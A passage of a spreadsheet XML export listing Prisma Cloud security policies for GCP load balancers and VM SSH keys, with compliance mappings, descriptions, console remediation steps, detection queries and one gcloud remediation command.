        </is>
      </c>
      <c r="K2858" t="inlineStr">
        <is>
          <t>GCP VM instances have block project-wide SSH keys feature disabled</t>
        </is>
      </c>
      <c r="L2858" t="inlineStr">
        <is>
          <t>KEYS_AND_SECRETS</t>
        </is>
      </c>
      <c r="M2858" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2858" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2858" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2858" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2858" t="inlineStr">
        <is>
          <t>Guidelines for System Hardening</t>
        </is>
      </c>
      <c r="R2858" t="inlineStr">
        <is>
          <t>ISM-1409</t>
        </is>
      </c>
      <c r="S2858" t="inlineStr"/>
      <c r="T2858" t="b">
        <v>1</v>
      </c>
      <c r="U2858" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2858" t="inlineStr">
        <is>
          <t>gcloud-compute-project-info</t>
        </is>
      </c>
      <c r="W2858" t="inlineStr">
        <is>
          <t>This policy identifies VM instances which have block project-wide SSH keys feature disabled. Project-wide SSH keys are stored in Compute/Project-metadata. Project-wide SSH keys can be used to login into all the instances within a project. Using project-wide SSH keys eases the SSH key management but if compromised, poses the security risk which can impact all the instances within a project. It is recommended to use Instance specific SSH keys which can limit the attack surface if the SSH keys are compromised.</t>
        </is>
      </c>
      <c r="X2858" t="inlineStr">
        <is>
          <t>1. Login to GCP Portal
2. Go to Computer Engine (Left Panel)
3. Go to VM instances
4. From the list of VMs, choose the reported VM
5. Click on Edit button
6. Under SSH Keys section, Check 'Block project-wide SSH keys' on the checkbox
7. Click on Save</t>
        </is>
      </c>
      <c r="Y2858" t="inlineStr">
        <is>
          <t>'description': "This CLI command requires 'compute.instances.setMetadata' permission. Successful execution will adds metadata 'block-project-ssh-keys' as TRUE to the GCP compute instance metadata section.\nNote: This CLI command won't be able to remediate instance groups",
'impact': "adds metadata 'block-project-ssh-keys' to the GCP compute instance",
'cliScriptTemplate': 'gcloud compute instances add-metadata $resourceName --project $account --zone $gcpZoneId --metadata=block-project-ssh-keys=TRUE'</t>
        </is>
      </c>
      <c r="Z2858" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'gcloud-compute-project-info' AND json.rule = commonInstanceMetadata.kind equals "compute#metadata" and commonInstanceMetadata.items[?any(key contains "enable-oslogin" and (value contains "Yes" or value contains "Y" or value contains "True" or value contains "true" or value contains "TRUE" or value contains "1"))] does not exist and commonInstanceMetadata.items[?any(key contains "ssh-keys")] exists as X; config from cloud.resource where api.name = 'gcloud-compute-instances-list' AND json.rule = status equals RUNNING and ( metadata.items[?any(key exists and key contains "block-project-ssh-keys" and (value contains "Yes" or value contains "Y" or value contains "True" or value contains "true" or value contains "TRUE" or value contains "1"))] does not exist and metadata.items[?any(key exists and key contains "enable-oslogin" and (value contains "Yes" or value contains "Y" or value contains "True" or value contains "true" or value contains "TRUE" or value contains "1"))] does not exist and name does not start with "gke-") as Y; filter '$.Y.zone contains $.X.name'; show Y;</t>
        </is>
      </c>
      <c r="AA2858" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2858" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2858" t="inlineStr">
        <is>
          <t>PC-GCP-GCE-200</t>
        </is>
      </c>
      <c r="AD2858" t="b">
        <v>1</v>
      </c>
      <c r="AE2858" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2858" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG28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58" t="inlineStr">
        <is>
          <t>72b422c8-bef1-4842-a6c6-7230bf0b3492</t>
        </is>
      </c>
      <c r="AI2858" t="inlineStr">
        <is>
          <t>8ae5d48f-8f65-4844-8f32-c83e1d6626ba</t>
        </is>
      </c>
      <c r="AJ2858" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2858" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2859">
      <c r="A2859" t="inlineStr">
        <is>
          <t>NIST 800-53 Rev 5</t>
        </is>
      </c>
      <c r="B2859" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2859" s="2" t="inlineStr"/>
      <c r="D2859" t="inlineStr"/>
      <c r="E2859" t="inlineStr"/>
      <c r="F2859" t="inlineStr"/>
      <c r="G2859" t="b">
        <v>1</v>
      </c>
      <c r="H28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59" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2859" t="inlineStr">
        <is>
          <t>gcloud-compute</t>
        </is>
      </c>
      <c r="K2859" t="inlineStr">
        <is>
          <t>GCP public-facing (external) regional load balancer using HTTP protocol</t>
        </is>
      </c>
      <c r="L2859" t="inlineStr">
        <is>
          <t>UNENCRYPTED_DATA</t>
        </is>
      </c>
      <c r="M2859" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2859" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2859" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2859" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2859" t="inlineStr">
        <is>
          <t>SC</t>
        </is>
      </c>
      <c r="R2859" t="inlineStr">
        <is>
          <t>Transmission Confidentiality and Integrity | Cryptographic Protection</t>
        </is>
      </c>
      <c r="S2859" t="inlineStr"/>
      <c r="T2859" t="b">
        <v>0</v>
      </c>
      <c r="U2859" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2859" t="inlineStr">
        <is>
          <t>gcloud-compute-regional-forwarding-rule</t>
        </is>
      </c>
      <c r="W2859" t="inlineStr">
        <is>
          <t>This policy identifies GCP public-facing (external) regional load balancers that are using HTTP protocol.
Using the HTTP protocol with a GCP external load balancer transmits data in plaintext, making it vulnerable to eavesdropping, interception, and modification by malicious actors. This lack of encryption exposes sensitive information, increases the risk of man-in-the-middle attacks, and compromises the overall security and privacy of the data exchanged between clients and servers.
It is recommended to use HTTPS protocol with external-facing load balancers.</t>
        </is>
      </c>
      <c r="X2859" t="inlineStr">
        <is>
          <t>1. Login to the GCP console
2. Navigate to 'Network Service' and then 'Load Balancing'
3. Click on the 'FRONTENDS' tab
4. Identify the frontend that is using the reported forwarding rule.
5. Click on the load balancer name associated with the frontend identified above
6. Click 'Edit'
7. Go to 'Frontend configuration'
8. Delete the frontend rule that allows HTTP protocol.
9. Add new frontend rule(s) as required. Make sure to use HTTPS protocol instead of HTTP for new rules.
10. Click 'Update'
11. Click 'UPDATE LOAD BALANCER' in the pop-up.</t>
        </is>
      </c>
      <c r="Y2859" t="inlineStr"/>
      <c r="Z2859" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-compute-regional-forwarding-rule' AND json.rule = target contains "/targetHttpProxies/" and loadBalancingScheme contains "EXTERNAL"</t>
        </is>
      </c>
      <c r="AA2859" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2859" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2859" t="inlineStr">
        <is>
          <t>PC-GCP-GCE-1268</t>
        </is>
      </c>
      <c r="AD2859" t="b">
        <v>1</v>
      </c>
      <c r="AE2859" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2859" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG28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59" t="inlineStr">
        <is>
          <t>646f94d4-6499-4c24-99ec-949a1ea6f311</t>
        </is>
      </c>
      <c r="AI2859" t="inlineStr">
        <is>
          <t>c53fa2b3-af35-44b4-a9ff-da1d3dd81c17</t>
        </is>
      </c>
      <c r="AJ2859" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2859" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2860">
      <c r="A2860" t="inlineStr">
        <is>
          <t>PCI DSS v4.0, ISO/IEC 27001:2022, APRA (CPS 234) Information Security, CRI Profile v2.0, APRA (CPS 234) Information Security, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), GDPR, NIST CSF v2.0, Demo_Daryl ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, NIST SP 800-172, New Zealand Information Security Manual (NZISM v3.4), Risk Management in Technology (RMiT), Insurance Regulatory And Development Authority Of India, PCI DSS v3.2.1, ISO/IEC 27002:2013, HITRUST v.9.4.2 [Deprecated], NIST CSF, APRA (CPS 234) Information Security, NIST 800-53 Rev 5, ISO/IEC 27002:2013, FFIEC, ITSG-33, CRI Profile v2.0, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), ISO/IEC 27002:2013, NIST SP 800-171 Revision 3, CIS Controls v7.1, Secure Controls Framework (SCF) - 2022.2.1, CRI Profile v1.2.1, ISO/IEC 27018:2019, Copy of New Zealand Information Security Manual (NZISM v3.4), CSA CCM v.4.0.1, Demo_Daryl ACSC Information Security Manual (ISM), Copy of CIS Controls v8, ISO 27002:2022, ACSC Information Security Manual (ISM), Copy of ACSC Information Security Manual (ISM)-clone, ISO/IEC 27017:2015, NIST SP 800-171 Revision 2, ISO/IEC 27001:2022, GDPR, CIS Controls v7.1, PCI DSS v4.0, DORA, NIST CSF v2.0, TX-RAMP Level 2, PCI DSS v4.0, PCI DSS v4.0, NIST 800-53 Rev4, kashan ACSC Information Security Manual (ISM), CDC NIST 800-53 Rev4, ISO/IEC 27002:2013, NIST SP 800-171 Revision 3, ISO/IEC 27017:2015, CSA CCM v.4.0.1, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), CIS Controls v8.1, APRA (CPS 234) Information Security, Sarbanes Oxley Act (SOX), Secure Controls Framework (SCF) - 2024.2, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, CSA CCM v.4.0.1, CRI Profile v1.2.1, SOC 2, kfirdaus AWS Account-CS, PCI DSS v3.2.1, CRI Profile v2.0, ISO/IEC 27018:2019, CSA CCM v.4.0.1, Fedramp (Moderate), ISO/IEC 27002:2013, PCI DSS v4.0, NYDFS 23 CRR-NY 500.0, APRA (CPS 234) Information Security, CCPA 2018, PIPEDA, Demo_Daryl ACSC Information Security Manual (ISM), CIS Controls v8, CSA CCM v.4.0.1, Brazilian Data Protection Law (LGPD), ISO/IEC 27002:2013, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), RBI Baseline Cyber Security and Resilience Requirements, Cybersecurity Maturity Model Certification (CMMC) v.1.02, PCI DSS v4.0</t>
        </is>
      </c>
      <c r="B2860" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2860" s="2" t="inlineStr"/>
      <c r="D2860" t="inlineStr"/>
      <c r="E2860" t="inlineStr"/>
      <c r="F2860" t="inlineStr"/>
      <c r="G2860" t="b">
        <v>1</v>
      </c>
      <c r="H28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0" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2860" t="inlineStr">
        <is>
          <t>gcloud-compute</t>
        </is>
      </c>
      <c r="K2860" t="inlineStr">
        <is>
          <t>GCP HTTPS Load balancer SSL Policy not using restrictive profile</t>
        </is>
      </c>
      <c r="L2860" t="inlineStr">
        <is>
          <t>UNENCRYPTED_DATA</t>
        </is>
      </c>
      <c r="M2860" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2860" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2860" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2860" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2860" t="inlineStr">
        <is>
          <t>Guidelines for Personnel Security</t>
        </is>
      </c>
      <c r="R2860" t="inlineStr">
        <is>
          <t>ISM-1648</t>
        </is>
      </c>
      <c r="S2860" t="inlineStr"/>
      <c r="T2860" t="b">
        <v>0</v>
      </c>
      <c r="U2860" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2860" t="inlineStr">
        <is>
          <t>gcloud-compute-ssl-policies</t>
        </is>
      </c>
      <c r="W2860" t="inlineStr">
        <is>
          <t>This policy identifies HTTPS Load balancers which are not using restrictive profile in it's SSL Policy, which controls sets of features used in negotiating SSL with clients. As a best security practice, use RESTRICTED as SSL policy profile as it meets stricter compliance requirements and does not include any out-of-date SSL features.</t>
        </is>
      </c>
      <c r="X2860" t="inlineStr">
        <is>
          <t>1. Login to GCP Portal
2. Go to Network services (Left Panel)
3. Select Load balancing
4. Click on 'advanced menu' hyperlink to view target proxies
5. Click on 'Target proxies' tab
6. Click on the reported HTTPS target proxy
7. Click on the hyperlink under 'URL map'
8. Click on the 'EDIT' button
9. Select 'Frontend configuration', Click on HTTPS protocol rule
10. Select SSL policy which uses the RESTRICTED/CUSTOM profile or if no SSL policy is already present then create a new SSL policy with RESTRICTED as Profile.
NOTE: If you choose CUSTOM as profile then make sure you are using profile features equally restrictive as the RESTRICTED profile or more than the RESTRICTED profile.
11. Click on 'Done'
12. Click on 'Update'</t>
        </is>
      </c>
      <c r="Y2860" t="inlineStr"/>
      <c r="Z2860" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'gcloud-compute-ssl-policies' AND json.rule = profile does not equal RESTRICTED and profile does not equal CUSTOM as X; config from cloud.resource where api.name = 'gcloud-compute-target-https-proxies' AND json.rule = sslPolicy exists as Y; filter " $.X.selfLink contains $.Y.sslPolicy "; show Y;</t>
        </is>
      </c>
      <c r="AA2860" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2860" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2860" t="inlineStr">
        <is>
          <t>PC-GCP-LB-387</t>
        </is>
      </c>
      <c r="AD2860" t="b">
        <v>1</v>
      </c>
      <c r="AE2860" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2860" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG28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0" t="inlineStr">
        <is>
          <t>1d3ca993-bd2c-4df0-8048-6c82de53cf5f</t>
        </is>
      </c>
      <c r="AI2860" t="inlineStr">
        <is>
          <t>681a24cf-7a14-4c35-ad43-16c049f3ca63</t>
        </is>
      </c>
      <c r="AJ2860" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2860" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2861">
      <c r="A2861" t="inlineStr">
        <is>
          <t>HIPAA, CIS Controls v8, ISO/IEC 27001:2022, CSA CCM v.4.0.1, ISO/IEC 27001:2022, APRA (CPS 234) Information Security, CSA CCM v.4.0.6, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), GDPR, CSA CCM v.4.0.6, APRA (CPS 234) Information Security, NIST SP 800-172, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, ISO 27002:2022, PCI DSS v4.0, New Zealand Information Security Manual (NZISM v3.4), MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, Risk Management in Technology (RMiT), ISO/IEC 27002:2013, PCI DSS v3.2.1, HITRUST v.9.4.2 [Deprecated], APRA (CPS 234) Information Security, ISO/IEC 27002:2013, ISO/IEC 27018:2019, ISO/IEC 27002:2013, MITRE ATT&amp;CK v10.0 [Deprecated], ISO/IEC 27002:2013, NIST 800-53 Rev 5, NIST CSF, ISO/IEC 27002:2013, ISO/IEC 27002:2013, NIST SP 800-171 Revision 2, CSA CCM v4.0.12, CIS Controls v7.1, CSA CCM v.4.0.6, MITRE ATT&amp;CK v12, Copy of New Zealand Information Security Manual (NZISM v3.4), ACSC Information Security Manual (ISM), CSA CCM v.4.0.6, PCI DSS v4.0, ISO 27002:2022, Copy of ACSC Information Security Manual (ISM)-clone, ISO/IEC 27017:2015, ISO/IEC 27001:2022, Matt's ATT&amp;ACK, ISO/IEC 27017:2015, GDPR, Secure Controls Framework (SCF) - 2024.2, CIS Controls v7.1, DORA, ISO/IEC 27002:2013, TX-RAMP Level 2, CSA CCM v4.0.12, ISO/IEC 27002:2013, NIST 800-53 Rev4, kashan ACSC Information Security Manual (ISM), CDC NIST 800-53 Rev4, Microsoft Cloud Security Benchmark v1, FFIEC, ISO/IEC 27018:2019, Copy of CIS Controls v8, ISO/IEC 27017:2015, NIST SP 800-171 Revision 3, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, Secure Controls Framework (SCF) - 2022.2.1, CSA CCM v.4.0.1, Sarbanes Oxley Act (SOX), APRA (CPS 234) Information Security, PCI DSS v4.0, RBI Baseline Cyber Security and Resilience Requirements, SOC 2, NIST CSF, Secure Controls Framework (SCF) - 2022.2.1, kfirdaus AWS Account-CS, PCI DSS v3.2.1, CSA CCM v.4.0.6, Fedramp (Moderate), Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27002:2013, ISO/IEC 27002:2013, Secure Controls Framework (SCF) - 2022.2.1, ISO/IEC 27001:2022, CIS Controls v8.1, NYDFS 23 CRR-NY 500.0, CSA CCM v4.0.12, CSA CCM v4.0.12, APRA (CPS 234) Information Security, CCPA 2018, PIPEDA, ISO/IEC 27002:2013, PCI DSS v4.0, CIS Controls v8.1, Brazilian Data Protection Law (LGPD), ISO/IEC 27002:2013, Secure Controls Framework (SCF) - 2024.2, ISO 27002:2022, CSA CCM v.4.0.1, Cybersecurity Maturity Model Certification (CMMC) v.1.02, Microsoft Cloud Security Benchmark v1</t>
        </is>
      </c>
      <c r="B2861" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2861" s="2" t="inlineStr"/>
      <c r="D2861" t="inlineStr"/>
      <c r="E2861" t="inlineStr"/>
      <c r="F2861" t="inlineStr"/>
      <c r="G2861" t="b">
        <v>1</v>
      </c>
      <c r="H28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1" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2861" t="inlineStr">
        <is>
          <t>gcloud-compute</t>
        </is>
      </c>
      <c r="K2861" t="inlineStr">
        <is>
          <t>GCP HTTPS Load balancer is configured with SSL policy having TLS version 1.1 or lower</t>
        </is>
      </c>
      <c r="L2861" t="inlineStr">
        <is>
          <t>UNENCRYPTED_DATA</t>
        </is>
      </c>
      <c r="M2861" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2861" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2861" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2861" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2861" t="inlineStr">
        <is>
          <t>Guidelines for Cryptography</t>
        </is>
      </c>
      <c r="R2861" t="inlineStr">
        <is>
          <t>ISM-1139</t>
        </is>
      </c>
      <c r="S2861" t="inlineStr">
        <is>
          <t>Policy Status Review,Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2861" t="b">
        <v>0</v>
      </c>
      <c r="U2861" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2861" t="inlineStr">
        <is>
          <t>gcloud-compute-ssl-policies</t>
        </is>
      </c>
      <c r="W2861" t="inlineStr">
        <is>
          <t>This policy identifies HTTPS Load balancers is configured with SSL policy having TLS version 1.1 or lower. As a best security practice, use TLS 1.2 as the minimum TLS version in your load balancers SSL security policies.</t>
        </is>
      </c>
      <c r="X2861" t="inlineStr">
        <is>
          <t>1. Login to GCP Portal
2. Go to Network services (Left Panel)
3. Select Load balancing
4. Click on 'load balancing components view' hyperlink at bottom of the page to view target proxies
5. Click on 'TARGET PROXIES' tab
6. Click on the reported HTTPS target proxy
7. Click on the hyperlink under 'Load balancer'
8. Click on the 'EDIT' button
9. Select 'Frontend configuration', Click on HTTPS protocol rule
10. Select SSL policy that uses TLS 1.2 version or create a new SSL policy with TLS 1.2 as Minimum TLS version from the dropdown for 'SSL policy'
11. Click on 'DONE'
12. Click on 'UPDATE'</t>
        </is>
      </c>
      <c r="Y2861" t="inlineStr"/>
      <c r="Z2861" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'gcloud-compute-ssl-policies' AND json.rule = (profile equals MODERN or profile equals CUSTOM) and minTlsVersion does not equal "TLS_1_2" as X; config from cloud.resource where api.name = 'gcloud-compute-target-https-proxies' AND json.rule = sslPolicy exists as Y; filter "$.X.selfLink contains $.Y.sslPolicy"; show Y;</t>
        </is>
      </c>
      <c r="AA2861" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2861" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2861" t="inlineStr">
        <is>
          <t>PC-GCP-LB-388</t>
        </is>
      </c>
      <c r="AD2861" t="b">
        <v>1</v>
      </c>
      <c r="AE2861" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2861" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG28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1" t="inlineStr">
        <is>
          <t>0c75048b-54fd-4b6c-8eab-f6226e94ec96</t>
        </is>
      </c>
      <c r="AI2861" t="inlineStr">
        <is>
          <t>0f4d94c1-a1c4-43d3-afe1-d08d581a7ddc</t>
        </is>
      </c>
      <c r="AJ2861" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2861" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2862">
      <c r="A2862" t="inlineStr">
        <is>
          <t>HIPAA, PCI DSS v4.0, CSA CCM v.4.0.1, ISO/IEC 27001:2022, APRA (CPS 234) Information Security, CRI Profile v2.0, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), GDPR, NIST CSF v2.0, APRA (CPS 234) Information Security, NIST SP 800-172, New Zealand Information Security Manual (NZISM v3.4), ISO/IEC 27002:2013, Insurance Regulatory And Development Authority Of India, PCI DSS v3.2.1, HITRUST v.9.4.2 [Deprecated], APRA (CPS 234) Information Security, ISO/IEC 27002:2013, ISO/IEC 27018:2019, ISO/IEC 27002:2013, ISO/IEC 27002:2013, NIST 800-53 Rev 5, NIST CSF, FFIEC, ITSG-33, CRI Profile v2.0, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), ISO/IEC 27002:2013, ISO/IEC 27002:2013, NIST SP 800-171 Revision 2, CIS Controls v7.1, CRI Profile v1.2.1, Copy of New Zealand Information Security Manual (NZISM v3.4), Copy of CIS Controls v8, ISO 27002:2022, ACSC Information Security Manual (ISM), Copy of ACSC Information Security Manual (ISM)-clone, ISO/IEC 27017:2015, ISO/IEC 27001:2022, ISO/IEC 27017:2015, GDPR, Secure Controls Framework (SCF) - 2024.2, CIS Controls v7.1, PCI DSS v4.0, DORA, NIST CSF v2.0, ISO/IEC 27002:2013, TX-RAMP Level 2, ISO/IEC 27002:2013, PCI DSS v4.0, PCI DSS v4.0, NIST 800-53 Rev4, kashan ACSC Information Security Manual (ISM), CDC NIST 800-53 Rev4, Microsoft Cloud Security Benchmark v1, ISO/IEC 27018:2019, ISO/IEC 27017:2015, NIST SP 800-171 Revision 3, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), CIS Controls v8.1, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, Secure Controls Framework (SCF) - 2022.2.1, CSA CCM v.4.0.1, Sarbanes Oxley Act (SOX), APRA (CPS 234) Information Security, CRI Profile v1.2.1, SOC 2, NIST CSF, Secure Controls Framework (SCF) - 2022.2.1, kfirdaus AWS Account-CS, PCI DSS v3.2.1, CRI Profile v2.0, Fedramp (Moderate), Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27002:2013, ISO/IEC 27002:2013, Secure Controls Framework (SCF) - 2022.2.1, PCI DSS v4.0, NYDFS 23 CRR-NY 500.0, APRA (CPS 234) Information Security, CCPA 2018, PIPEDA, ISO/IEC 27002:2013, CIS Controls v8, Brazilian Data Protection Law (LGPD), ISO/IEC 27002:2013, Secure Controls Framework (SCF) - 2024.2, RBI Baseline Cyber Security and Resilience Requirements, CSA CCM v.4.0.1, Cybersecurity Maturity Model Certification (CMMC) v.1.02, PCI DSS v4.0</t>
        </is>
      </c>
      <c r="B2862" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2862" s="2" t="inlineStr"/>
      <c r="D2862" t="inlineStr"/>
      <c r="E2862" t="inlineStr"/>
      <c r="F2862" t="inlineStr"/>
      <c r="G2862" t="b">
        <v>1</v>
      </c>
      <c r="H28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2" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2862" t="inlineStr">
        <is>
          <t>gcloud-compute</t>
        </is>
      </c>
      <c r="K2862" t="inlineStr">
        <is>
          <t>GCP Load balancer HTTPS target proxy configured with default SSL policy instead of custom SSL policy</t>
        </is>
      </c>
      <c r="L2862" t="inlineStr">
        <is>
          <t>UNENCRYPTED_DATA</t>
        </is>
      </c>
      <c r="M2862" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2862" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2862" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2862" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2862" t="inlineStr">
        <is>
          <t>Guidelines for Cryptography</t>
        </is>
      </c>
      <c r="R2862" t="inlineStr">
        <is>
          <t>ISM-1139</t>
        </is>
      </c>
      <c r="S2862" t="inlineStr"/>
      <c r="T2862" t="b">
        <v>0</v>
      </c>
      <c r="U2862" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2862" t="inlineStr">
        <is>
          <t>gcloud-compute-target-https-proxies</t>
        </is>
      </c>
      <c r="W2862" t="inlineStr">
        <is>
          <t>This policy identifies Load balancer HTTPS target proxies which are configured with default SSL Policy instead of custom SSL policy. It is a best practice to use custom SSL policy to access load balancers. It gives you closer control over SSL/TLS versions and ciphers.</t>
        </is>
      </c>
      <c r="X2862" t="inlineStr">
        <is>
          <t>1. Login to GCP Portal
2. Go to Network services (Left Panel)
3. Select Load balancing
4. Click on 'advanced menu' hyperlink to view target proxies
5. Click on 'Target proxies' tab
6. Click on the reported HTTPS target proxy
7. Click on the hyperlink under 'URL map'
8. Click on the 'EDIT' button
9. Select 'Frontend configuration', Click on HTTPS protocol rule
10. For 'SSL policy', choose any custom SSL policy other than 'GCP default'
11. Click on 'Done'
12. Click on 'Update'</t>
        </is>
      </c>
      <c r="Y2862" t="inlineStr"/>
      <c r="Z2862" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-compute-target-https-proxies' AND json.rule = 'sslPolicy does not exist or sslPolicy is empty'</t>
        </is>
      </c>
      <c r="AA2862" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2862" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2862" t="inlineStr">
        <is>
          <t>PC-GCP-LB-386</t>
        </is>
      </c>
      <c r="AD2862" t="b">
        <v>1</v>
      </c>
      <c r="AE2862" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2862" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG28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2" t="inlineStr">
        <is>
          <t>5c550efc-5d45-4de0-8794-2cf7df2f0698</t>
        </is>
      </c>
      <c r="AI2862" t="inlineStr">
        <is>
          <t>0d7723d7-00ae-4a57-a8bd-280f9a05c48e</t>
        </is>
      </c>
      <c r="AJ2862" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2862" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2863">
      <c r="A2863" t="inlineStr">
        <is>
          <t>ISO/IEC 27001:2022, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, Risk Management in Technology (RMiT), Secure Controls Framework (SCF) - 2024.2, NIST 800-53 Rev 5, CIS Controls v8.1, SOC 2, HITRUST CSF v.11.2.0, CIS v2.0.0 (GCP) Level 1, ISO/IEC 27001:2022, TX-RAMP Level 1, Insurance Regulatory And Development Authority Of India, DORA, TX-RAMP Level 2, Microsoft Cloud Security Benchmark v1, ISO/IEC 27001:2022, CIS v3.0.0 (GCP) Level 1, Sarbanes Oxley Act (SOX), ITSG-33, SOC 2, GDPR, SOC 2, ISO/IEC 27001:2022, NYDFS 23 CRR-NY 500.0, Secure Controls Framework (SCF) - 2022.2.1, CIS Controls v8.1, TX-RAMP Level 2, Microsoft Cloud Security Benchmark v1</t>
        </is>
      </c>
      <c r="B2863" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2863" s="2" t="inlineStr"/>
      <c r="D2863" t="inlineStr"/>
